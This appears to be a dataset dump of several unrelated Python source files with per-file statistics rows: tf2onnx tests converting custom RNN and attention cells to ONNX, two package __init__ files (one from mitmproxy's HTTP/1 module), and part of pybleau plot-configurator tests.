| 62.759259 | 2,465 | 0.618353 | 2,041 | 16,945 | 4.976972 | 0.194023 | 0.011813 | 0.014767 | 0.004725 | 0.788443 | 0.786671 | 0.784209 | 0.778697 | 0.778697 | 0.778697 | 0 | 0.012832 | 0.314724 | 16,945 | 269 | 2,466 | 62.992565 | 0.861953 | 0.652995 | 0 | 0.483607 | 0 | 0 | 0.133215 | 0.038287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0.016393 | 0.07377 | 0.008197 | 0.221311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5d77f5c8748dabbe0cc911d4482f70143a174f14
| 43 |
py
|
Python
|
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
from .IFileConverter import IFileConverter
| 21.5 | 42 | 0.883721 | 4 | 43 | 9.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.974359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
5dd8d749d5dd08650d2aee4a619e3e875e2659a0
| 19,959 |
py
|
Python
|
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | 1 |
2021-05-11T21:51:52.000Z
|
2021-05-11T21:51:52.000Z
|
# SPDX-License-Identifier: Apache-2.0
"""Unit Tests for custom rnns."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import init_ops
from backend_test_base import Tf2OnnxBackendTestBase
from common import * # pylint: disable=wildcard-import, unused-wildcard-import
from tf2onnx.tf_loader import is_tf2
# pylint: disable=missing-docstring,invalid-name,unused-argument,using-constant-test
# pylint: disable=abstract-method,arguments-differ
if is_tf2():
BasicLSTMCell = tf.compat.v1.nn.rnn_cell.BasicLSTMCell
LSTMCell = tf.compat.v1.nn.rnn_cell.LSTMCell
GRUCell = tf.compat.v1.nn.rnn_cell.GRUCell
RNNCell = tf.compat.v1.nn.rnn_cell.RNNCell
MultiRNNCell = tf.compat.v1.nn.rnn_cell.MultiRNNCell
dynamic_rnn = tf.compat.v1.nn.dynamic_rnn
bidirectional_dynamic_rnn = tf.compat.v1.nn.bidirectional_dynamic_rnn
else:
LSTMBlockCell = tf.contrib.rnn.LSTMBlockCell
LSTMCell = tf.nn.rnn_cell.LSTMCell
GRUCell = tf.nn.rnn_cell.GRUCell
RNNCell = tf.nn.rnn_cell.RNNCell
MultiRNNCell = tf.contrib.rnn.MultiRNNCell
dynamic_rnn = tf.nn.dynamic_rnn
bidirectional_dynamic_rnn = tf.nn.bidirectional_dynamic_rnn
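# The aliases above let the same test bodies run against the TF1-style
# tf.nn.rnn_cell API and its tf.compat.v1 equivalents under TF2. A minimal
# sketch of the pattern the tests below exercise (illustrative only):
#   cell = GatedGRUCell(5)
#   outputs, state = dynamic_rnn(cell, inputs, dtype=tf.float32)
# tf2onnx maps the resulting rnn loop to the ONNX Scan op, hence the
# @check_opset_min_version(8, "Scan") guards on these tests.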
class CustomRnnCellTests(Tf2OnnxBackendTestBase):
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn(self):
size = 5 # size of each model layer.
batch_size = 1
cell = GatedGRUCell(size)
x_val = np.array([[1., 1.], [2., 2.], [3., 3.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
xs, s = dynamic_rnn(cell=cell, dtype=tf.float32, inputs=x, time_major=False)
return tf.identity(xs, name="output"), tf.identity(s, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_time_major(self):
size = 5 # size of each model layer.
batch_size = 1
x_val = np.array([[1., 1.], [2., 2.], [3., 3.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
cell = GatedGRUCell(size)
xs, s = dynamic_rnn(cell=cell, dtype=tf.float32, inputs=x, time_major=True)
return tf.identity(xs, name="output"), tf.identity(s, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_with_seq_length(self):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.], [5., 5.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
# no scope
cell = GatedGRUCell(units)
outputs, cell_state = dynamic_rnn(
cell,
x,
dtype=tf.float32,
sequence_length=[4, 3, 4, 5, 2, 1])
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_with_non_const_seq_length(self):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.], [5., 5.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
y_val = np.array([4, 3, 4, 5, 2, 1], dtype=np.int32)
def func(x, seq_length):
# no scope
cell = GatedGRUCell(units)
outputs, cell_state = dynamic_rnn(
cell,
x,
dtype=tf.float32,
sequence_length=tf.identity(seq_length))
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
feed_dict = {"input_1:0": x_val, "input_2:0": y_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_const_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`.
decoder_time_step = 6
x_val = np.random.randn(decoder_time_step, input_size).astype('f')
x_val = np.stack([x_val] * batch_size)
attention_states = np.random.randn(batch_size, time_step, attn_size).astype('f')
def func(x):
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size, attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_lstm_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = LSTMCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
output_0 = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return output_0, tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_gru_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = GRUCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
_ = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = GRUCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_lstm_encoder_input_has_none_dim(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = LSTMCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
_ = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_multi_rnn_lstm(self, state_is_tuple=True):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
initializer = init_ops.constant_initializer(0.5)
cell_0 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cell_1 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cell_2 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cells = MultiRNNCell([cell_0, cell_1, cell_2], state_is_tuple=state_is_tuple)
outputs, cell_state = dynamic_rnn(cells, x, dtype=tf.float32)
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
input_names_with_port = ["input_1:0"]
feed_dict = {"input_1:0": x_val}
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_opset(9, "ReverseSequence")
@skip_tf2()
@allow_missing_shapes("Missing RNN shape")
def test_bidrectional_attention_wrapper_lstm_encoder(self):
size = 30
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, batch_size, input_size).astype('f')
def func(encoder_x, decoder_x, seq_length):
encoder_cell = LSTMCell(size)
attention_states, _ = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
# [9, 3, 30], [9, 30]
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
match_cell_bk = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
(match_output_fw, match_output_bk), (match_state_fw, match_state_bk) = \
bidirectional_dynamic_rnn(cell_fw=match_cell_fw,
cell_bw=match_cell_bk,
inputs=decoder_x,
sequence_length=tf.identity(seq_length),
dtype=tf.float32,
time_major=True)
matched_output = tf.concat([match_output_fw, match_output_bk], axis=-1)
matched_state = tf.concat([match_state_fw.cell_state, match_state_bk.cell_state], -1)
return tf.identity(matched_output, name="output_0"), tf.identity(matched_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val,
"input_3:0": np.array([6, 5, 4, 3, 2, 1, 2, 3, 6], dtype=np.int32)}
input_names_with_port = ["input_1:0", "input_2:0", "input_3:0"]
output_names_with_port = ["output_0:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
class GatedGRUCell(RNNCell):
def __init__(self, hidden_dim, reuse=None):
super().__init__(_reuse=reuse)
self._num_units = hidden_dim
self._activation = tf.tanh
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
# inputs shape: [batch size, time step, input size] = [1, 3, 2]
# num_units: 5
# W shape: [2, 3 * 5] = [2, 15]
# U shape: [5, 3 * 5] = [5, 15]
# b shape: [1, 3 * 5] = [1, 15]
# state shape: [batch size, state size] = [1, 5]
input_dim = inputs.get_shape()[-1]
assert input_dim is not None, "input dimension must be defined"
# W = tf.get_variable(name="W", shape=[input_dim, 3 * self._num_units], dtype=tf.float32)
W = np.arange(30.0, dtype=np.float32).reshape((2, 15))
# U = tf.get_variable(name='U', shape=[self._num_units, 3 * self._num_units], dtype=tf.float32)
U = np.arange(75.0, dtype=np.float32).reshape((5, 15))
# b = tf.get_variable(name='b', shape=[1, 3 * self._num_units], dtype=tf.float32)
b = np.arange(15.0, dtype=np.float32).reshape((1, 15))
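# The block below implements a GRU-style update with fixed weights
# (x = inputs, h = state; W, U and b each hold three concatenated gate
# blocks, separated by tf.split(..., 3, 1)):
#   r      = sigmoid(x*W_r + b_r + h*U_r)     reset gate
#   z      = sigmoid(x*W_z + b_z + h*U_z)     update gate
#   h_cand = tanh(x*W_h + b_h + r * (h*U_h))  candidate state
#   h_next = h_cand * (1 - z) + h * z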
xw = tf.split(tf.matmul(inputs, W) + b, 3, 1)
hu = tf.split(tf.matmul(state, U), 3, 1)
r = tf.sigmoid(xw[0] + hu[0])
z = tf.sigmoid(xw[1] + hu[1])
h1 = self._activation(xw[2] + r * hu[2])
next_h = h1 * (1 - z) + state * z
return next_h, next_h
if __name__ == '__main__':
unittest_main()
| 46.962353 | 119 | 0.584348 | 2,555 | 19,959 | 4.228571 | 0.08454 | 0.019993 | 0.049334 | 0.036931 | 0.802943 | 0.787764 | 0.745187 | 0.724084 | 0.719363 | 0.715383 | 0 | 0.029786 | 0.310336 | 19,959 | 424 | 120 | 47.073113 | 0.755104 | 0.078761 | 0 | 0.692073 | 0 | 0 | 0.047087 | 0 | 0 | 0 | 0 | 0 | 0.003049 | 1 | 0.073171 | false | 0 | 0.027439 | 0.006098 | 0.146341 | 0.003049 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5de7a1ab9ad6ce3cc45b32937415c25c0fb99a65
| 546 |
py
|
Python
|
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
from .read import (
read_request_head,
read_response_head,
connection_close,
expected_http_body_size,
validate_headers,
)
from .assemble import (
assemble_request, assemble_request_head,
assemble_response, assemble_response_head,
assemble_body,
)
__all__ = [
"read_request_head",
"read_response_head",
"connection_close",
"expected_http_body_size",
"validate_headers",
"assemble_request", "assemble_request_head",
"assemble_response", "assemble_response_head",
"assemble_body",
]
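# Rough lifecycle (sketch): read_request_head/read_response_head parse the
# start line and headers, expected_http_body_size determines how much body
# to read, connection_close decides whether the connection is reused, and
# the assemble_* helpers serialize messages back to wire format.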
| 21.84 | 50 | 0.727106 | 59 | 546 | 6.118644 | 0.271186 | 0.121884 | 0.083102 | 0.105263 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0 | 0 | 0.18315 | 546 | 24 | 51 | 22.75 | 0.809417 | 0 | 0 | 0 | 0 | 0 | 0.327839 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
b905b9044ea31f3964e2eca2dbedd8cd13ec51f5
| 16,884 |
py
|
Python
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 4 |
2020-02-27T22:38:29.000Z
|
2021-05-03T05:32:11.000Z
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 85 |
2020-02-04T21:57:14.000Z
|
2021-05-03T14:29:40.000Z
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 1 |
2020-02-20T00:45:09.000Z
|
2020-02-20T00:45:09.000Z
|
from __future__ import division
from unittest import skipIf, TestCase
import os
from pandas import DataFrame
import numpy as np
from numpy.testing import assert_array_equal
BACKEND_AVAILABLE = os.environ.get("ETS_TOOLKIT", "qt4") != "null"
if BACKEND_AVAILABLE:
from app_common.apptools.testing_utils import assert_obj_gui_works
from pybleau.app.plotting.plot_config import HeatmapPlotConfigurator, \
HEATMAP_PLOT_TYPE, HistogramPlotConfigurator, HIST_PLOT_TYPE, \
LinePlotConfigurator, BarPlotConfigurator, ScatterPlotConfigurator, \
SCATTER_PLOT_TYPE, CMAP_SCATTER_PLOT_TYPE, LINE_PLOT_TYPE, \
BAR_PLOT_TYPE
LEN = 16
TEST_DF = DataFrame({"a": [1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4],
"b": [1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4],
"c": [1, 2, 3, 4, 2, 3, 1, 1, 4, 4, 5, 6, 4, 4, 5, 6],
"d": list("ababcabcdabcdeab"),
"e": np.random.randn(LEN),
"f": range(LEN),
# Highly repetitive column to split the entire data into 2
"g": np.array(["0", "1"] * (LEN // 2)),
"h": np.array([0, 1] * (LEN // 2), dtype=bool),
})
class BasePlotConfig(object):
def test_creation_fails_if_no_df(self):
with self.assertRaises(ValueError):
config = self.configurator()
config.to_dict()
def test_bring_up(self):
obj = self.configurator(data_source=TEST_DF)
assert_obj_gui_works(obj)
# Assertion utilities -----------------------------------------------------
def assert_editor_options(self, editor):
editor_options = editor.values
if self.numerical_cols_only:
for col in editor_options:
if col != "index":
self.assertIn(TEST_DF[col].dtype, (np.int64, np.float64))
else:
self.assertEqual(set(editor_options),
set(TEST_DF.columns) | {"index"})
class BaseXYPlotConfig(BasePlotConfig):
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], TEST_DF["a"].values)
self.assertIn("y_arr", config_dict)
assert_array_equal(config_dict["y_arr"], TEST_DF["b"].values)
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
y_editor = view_items[1].content[0].editor
self.assert_editor_options(y_editor)
def test_plot_colored_by_str_col(self):
# Color by a column filled with boolean values
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
self.assertIn(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], dict)
d_values = TEST_DF["d"].unique()
self.assertEqual(set(config_dict["x_arr"].keys()), set(d_values))
for arr in config_dict["x_arr"].values():
self.assertIsInstance(arr, np.ndarray)
# For example:
assert_array_equal(config_dict["x_arr"]["c"], np.array([1, 4, 4]))
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], dict)
self.assertEqual(set(config_dict["y_arr"].keys()), set(d_values))
for arr in config_dict["y_arr"].values():
self.assertIsInstance(arr, np.ndarray)
# For example:
assert_array_equal(config_dict["y_arr"]["c"], np.array([2, 2, 3]))
def test_plot_colored_by_bool_col(self):
# Color by a column filled with boolean values
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="h")
self.assertIn(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], dict)
hue_values = set(TEST_DF["h"])
self.assertEqual(set(config_dict["x_arr"].keys()), hue_values)
assert_array_equal(config_dict["x_arr"][False], TEST_DF["a"][::2])
assert_array_equal(config_dict["x_arr"][True], TEST_DF["a"][1::2])
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], dict)
self.assertEqual(set(config_dict["y_arr"].keys()), hue_values)
assert_array_equal(config_dict["y_arr"][False], TEST_DF["b"][::2])
assert_array_equal(config_dict["y_arr"][True], TEST_DF["b"][1::2])
def test_plot_colored_by_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestScatterPlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = ScatterPlotConfigurator
self.basic_type = SCATTER_PLOT_TYPE
self.numerical_cols_only = True
def test_plot_scatter_colored_by_int_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="c")
self.assertEqual(config.plot_type, CMAP_SCATTER_PLOT_TYPE)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], np.ndarray)
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], np.ndarray)
self.assertIn("z_arr", config_dict)
self.assertIsInstance(config_dict["z_arr"], np.ndarray)
def test_plot_scatter_colored_by_float_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
self.assertEqual(config.plot_type, CMAP_SCATTER_PLOT_TYPE)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], np.ndarray)
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], np.ndarray)
self.assertIn("z_arr", config_dict)
self.assertIsInstance(config_dict["z_arr"], np.ndarray)
def test_style_colorize_by_float_changes_on_color_column_change(self):
""" The dtype of the column to colorize controls colorize_by_float.
"""
# Color by a string:
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
self.assertFalse(config.plot_style.colorize_by_float)
# Color by a float:
config.z_col_name = "e"
self.assertTrue(config.plot_style.colorize_by_float)
def test_scatter_data_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._data_selection_columns()
expected = config._numerical_columns
self.assertCountEqual(columns, expected)
def test_scatter_color_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._color_selection_columns()
expected = [""] + config._available_columns
self.assertCountEqual(columns, expected)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestLinePlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = LinePlotConfigurator
self.basic_type = LINE_PLOT_TYPE
self.numerical_cols_only = True
def test_line_data_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._data_selection_columns()
expected = config._numerical_columns
self.assertCountEqual(columns, expected)
def test_line_color_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._color_selection_columns()
expected = [""] + config._available_columns
self.assertCountEqual(columns, expected)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestBarPlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = BarPlotConfigurator
self.basic_type = BAR_PLOT_TYPE
self.numerical_cols_only = False
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
